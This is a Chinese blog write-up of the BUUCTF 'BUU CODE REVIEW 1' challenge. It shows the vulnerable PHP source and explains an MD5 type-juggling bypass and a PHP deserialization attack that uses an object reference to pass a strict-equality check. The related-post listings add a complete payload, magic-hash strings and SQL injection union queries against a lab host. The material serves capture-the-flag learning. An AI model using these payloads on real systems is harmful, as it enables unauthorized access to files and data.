【BUUCTF】basic web BUU CODE REVIEW 1 1(反序列化漏洞,传引用判断相等)

最新推荐文章于 2024-03-20 15:15:24 发布
最新推荐文章于 2024-03-20 15:15:24 发布
阅读量3.2k 收藏 5
点赞数 2
分类专栏: CTF刷题 WEB 文章标签: php 安全 反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45844670/article/details/109034458
版权 
<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */

highlight_file(__FILE__);

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

代码审计
查看执行的过程
发现我们需要用get方法传递pleaseget变量值为1,用post方法传递pleasepost变量值为1,然后用post方法传递md51和md52的内容不同
但是md5值相同
参考我的另一篇blog:https://blog.csdn.net/weixin_45844670/article/details/108286503

然后用post方法传obj变量,利用反序列化漏洞
这里要进行一个判断,就是buu类中的correct和input内容强相等,这里利用传引用的方法
$a= new BUU(); $a->correct=&$a->input; echo serialize($a);
更改这里序列化出来的内容
参考我的blog:https://blog.csdn.net/weixin_45844670/article/details/108171963

传递后即可得到flag

Kal1
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影“灰姑娘”中的咒语“ Bibidi Barbidibou”,分为三个,Bibi是制片人,Babidi是去除魔鬼印记的人,Buu成了魔鬼的名字。 以下是您将获得的其他功能的列表:-待办事项列表-设置您喜欢的壁纸-发现新的热点-书签-社交网络通知-每个新标签的高品质壁纸-时钟显示日期和时间-天气小部件-打开搜索 支持语言:English,中文 (简体),中文 (繁體)
BUUCTF初学解题记录——Basic
u010152530的博客
05-04 5592
目录Linux LabBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1未完待续。。。 Linux Lab # 地址和端口为示例,需要更改为动态分配后的地址和端口 ssh root@node233.buuoj.cn -p 233 # 输入默认密码123456 cat /flag.txt # 输出flag: # flag{ef2a6029-xxxx-xxxx-xxxx-86fb808b12f2} # 一开始以为只要大括号的内容就行了。。。
BUUCTF basic BUU CODE REVIEW 1&sqli-labs &BUU UPLOAD COURSE 1
网安小趴菜
08-26 963
BUUCTF basic BUU CODE REVIEW 1&sqli-labs&BUU UPLOAD COURSE 1 wp
BUUCTF/BUU CODE REVIEW 1
最新发布
weixin_44041994的博客
03-20 454
2.判断GET参数pleaseget的值是否为1,POST参数pleasepost的值是否为2,参数md51和md52的值是否不等,经过md5加密后的参数md51和md52的值是否相等,这四个条件同时满足的话,对POST参数obj进行反序列化,而对象被反序列化时会调用__destruct方法。序列化的定义是:在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送)以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。最后是进行反序列化的obj。
常见的MD5碰撞
aeymp589524的博客
10-31 399
md5值为0e开头 0e开头的md5和原值: QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611...
BUU CODE REVIEW 1
Jay17的博客
07-31 1298
BUU CODE REVIEW 1
BUU CODE REVIEW 1 1
shinygod的博客
03-30 1843
知识点:地址值 法1: GET:?pleaseget=1 POST:pleasepost=2&md51=QNKCDZO&md52=240610708&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;} 原理:QNKCDZO和240610708MD5一下为0e开头,又是弱等于,0的n次方还是0 法2: GET:?pleaseget=1 POST:pleasepost=2&md51[]=1&md52[
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2087
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
qq_58869808的博客
07-26 1563
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
[极客大挑战 2019]PHP反序列化漏洞中存在private变量)
weixin_45844670的博客
10-06 2315
根据题目提示“我经常备份”,推测可能是网站备份在某个路径下 使用dirmap扫描得到 下载得到一个压缩包,里面是网站的源码 里面的flag是假的 我们分析index.php和class.php index.php里面的php代码 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 这里是引用了class.php文件,用get方法入一个sel
BUUCTFweb sqli-labs 1(sql注入)
weixin_45844670的博客
10-12 1768
查询闭合 http://54250e8c-3b6c-4a66-8079-9beb8d389458.node3.buuoj.cn/Less-1/?id=0' 查询数据库 http://54250e8c-3b6c-4a66-8079-9beb8d389458.node3.buuoj.cn/Less-1/?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata -- a 查询表名 http://54250e
[MRCTF2020]你你呢 1 (文件上漏洞,利用.htaccess文件绕过)
weixin_45844670的博客
10-05 1744
buuctf的练习 https://buuoj.cn/challenges#[MRCTF2020]%E4%BD%A0%E4%BC%A0%E4%BD%A0%F0%9F%90%8E%E5%91%A2 预备知识: .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowO
buuctf basic
09-24
BUUCTF Basic是一个CTF比赛的基础题目,代码中主要包含了一个名为BUU的类,该类具有两个属性:$correct和$input。在类的析构函数__destruct()中,首先将$correct赋值为uniqid()的base64编码结果。接着判断$correct和$input是否全等,如果是,则打印根目录下的flag文件。 该代码中存在一个漏洞,在反序列化unserialize($_POST['obj'])时,可以通过构造恶意的序列化字符串来绕过代码中的限制条件,从而达到执行任意代码的目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值